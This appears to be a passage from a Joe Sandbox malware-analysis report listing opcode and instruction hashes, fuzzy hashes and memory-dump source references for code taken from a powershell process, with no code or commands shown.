                                                                                                                                          • Instruction ID: 26ede8785bb7c2e3b47c6e2f3e13aaceabfb29082ee64c61af6d6910a694cfd5
                                                                                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                          • Instruction Fuzzy Hash: 1F01677121CB0C8FDB58EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.2327821400.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffd34730000_powershell.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6c7f02198a661518c92b9f52f774c5396a7e36a52bdd56308e5c9a6902f505ac
                                                                                                                                          • Instruction ID: cb0293fe03b5137b0d3374b8db4ce90d77a31d4c3c64154186979108cfa32e50
                                                                                                                                          • Opcode Fuzzy Hash: 6c7f02198a661518c92b9f52f774c5396a7e36a52bdd56308e5c9a6902f505ac
                                                                                                                                          • Instruction Fuzzy Hash: 39917453B0E7D25FE712966CA8F60EA3FA0EF8322471940B7C2C4DA097DD1D640A93D1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.2327821400.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffd34730000_powershell.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cf7307273bfd4f079ed0b8b1ea27593b7b7d0d8345237e2422134cd14c7f3e5a
                                                                                                                                          • Instruction ID: f7e1ff478f32e6b382e3dc1ced631adf76fbe0b214535b945c7f2ad7d52a9bd6
                                                                                                                                          • Opcode Fuzzy Hash: cf7307273bfd4f079ed0b8b1ea27593b7b7d0d8345237e2422134cd14c7f3e5a
                                                                                                                                          • Instruction Fuzzy Hash: 3C519093B0D6D29FE323962D5CB60EA3BA5DF9326471C40F7C6C4CB093D90D2406A2E2